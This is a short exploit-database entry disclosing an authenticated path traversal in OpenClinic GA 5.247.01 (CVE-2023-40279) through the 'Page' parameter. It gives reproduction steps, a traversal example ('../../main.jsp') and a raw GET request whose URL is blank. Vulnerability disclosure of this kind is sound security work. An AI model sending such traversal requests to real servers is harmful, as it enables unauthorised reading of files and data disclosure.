# Exploit Title: OpenClinic GA 5.247.01 - Path Traversal (Authenticated)  
# Date: 2023-08-14  
# Exploit Author: V. B.  
# Vendor Homepage:  
# Software Link:  
# Version: OpenClinic GA 5.247.01  
# Tested on: Windows 10, Windows 11  
# CVE: CVE-2023-40279  
# Details  
An issue was discovered in OpenClinic GA version 5.247.01, where an attacker can perform a directory path traversal via the 'Page' parameter in a GET request to ''. This vulnerability allows for the retrieval and execution of files from arbitrary directories.  
# Proof of Concept (POC)  
Steps to Reproduce:  
- Crafting the Malicious GET Request:  
- Utilize a web browser or a tool capable of sending custom HTTP requests, such as curl or Burp Suite.  
- Format the GET request as follows (in this example, `../../main.jsp` is used to attempt directory traversal to access `main.jsp`):  
GET /openclinic/ HTTP/1.1  
Accept-Encoding: gzip, deflate  
Accept: */*  
Accept-Language: en-US;q=0.9,en;q=0.8  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36  
Connection: close  
Cache-Control: max-age=0  
2. Confirming the Vulnerability:  
- Send the crafted GET request to the target server.  
- If the server responds with the content of the requested file (e.g., `main.jsp`) from outside the intended directory, it confirms the presence of a directory path traversal vulnerability.  
- This vulnerability can lead to sensitive information disclosure or more severe attacks.